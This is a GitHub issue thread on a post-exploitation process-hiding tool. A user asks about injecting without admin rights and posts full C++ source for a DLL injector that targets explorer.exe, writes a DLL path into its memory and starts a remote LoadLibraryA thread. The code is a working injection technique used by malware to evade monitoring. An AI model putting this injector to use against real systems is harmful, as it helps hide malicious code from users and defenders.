search

M00nRise / ProcessHider

Post-exploitation tool for hiding processes from monitoring applications
709 stars 174 forks source link

without admin rights #5

Closed axe-usat closed 7 years ago

axe-usat commented 7 years ago

Im trying to learn for good purposes if it is possible inject without admin rights to hide the process but i think its not possible?

M00nRise commented 7 years ago

If you're working w/o admin privileges, you'll be able to hide processes only from programs in the same level of privileges as you, so if the admin opens task manager - he'll see you clearly

axe-usat commented 7 years ago

One question how you did to convert the injector to be able injecting in two different architectures? I will start one project of one injector in github for white hat reasons.

axe-usat commented 7 years ago

i will start with this code to do my own injector:

#include "stdafx.h"
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <Tlhelp32.h>
#include <wchar.h>
#include <iostream>
using namespace std;

void error(char *err);

HANDLE myProc = NULL;

void error(char *err)
{
    if (myProc != NULL) CloseHandle(myProc);
    printf("%s", err);
    exit(0);
}

int main(int argc, char *argv[])
{
    HANDLE processList = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    PROCESSENTRY32 pInfo;
    BOOL st = TRUE;
    pInfo.dwSize = sizeof(PROCESSENTRY32);
    Process32First(processList, &pInfo);
    int myPid = 0;
    do
    {
        std::wstring name(L"explorer.exe");
        const wchar_t* szName = name.c_str();
        if (wcscmp(pInfo.szExeFile, szName) == 0)
        {
            myPid = pInfo.th32ProcessID;
            cout << myPid << endl;
            break;
        }
        Process32Next(processList, &pInfo);
    } while (st != FALSE);

    // Abrir el proceso
    printf("[+] Opening process %i\n", myPid);
    myProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, myPid);
    if (myProc == NULL) error("[-] Error abriendo proceso.\n");
    else printf("[+] Proceso abierto.\n");

    // Reservar memoria para el argumento (ruta de la DLL)
    char thData[] = "C:/Users/moh/Desktop/dllmain.dll";
    LPVOID dirToArg = VirtualAllocEx(myProc, NULL, strlen(thData), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (dirToArg == NULL)
        error("[-] Error reservando memoria para argumento.\n");
    else
        printf("[+] Memoria reservada para argumento (%i bytes).\n", strlen(thData));

    // Escribir la ruta de la DLL en la memoria reservada
    SIZE_T written = 0;
    if (WriteProcessMemory(myProc, dirToArg, (LPVOID)&thData, strlen(thData), &written) == 0)
        error("[-] Error escribiendo memoria.\n");
    else
        printf("[+] Memoria escrita (arg %i bytes).\n", written);
     //Lanzar un hilo con LoadLibrary
     //Load the DLL
     //Load the DLL
    HANDLE rThread = CreateRemoteThread(myProc, NULL, NULL, (LPTHREAD_START_ROUTINE)GetProcAddress(LoadLibrary(L"Kernel32.dll"), "LoadLibraryA"), dirToArg, NULL, NULL);
    if (rThread == NULL)
        error("[-] Error creando el hilo.\n");
    else 
        printf("[+] Hilo creado.\n");
    CloseHandle( rThread );

}

But probably i will take support for 32 and 64 bits. for this i ask to start one project.

axe-usat commented 7 years ago

in my case i will do for dll but i think in your case is not for dll only .exe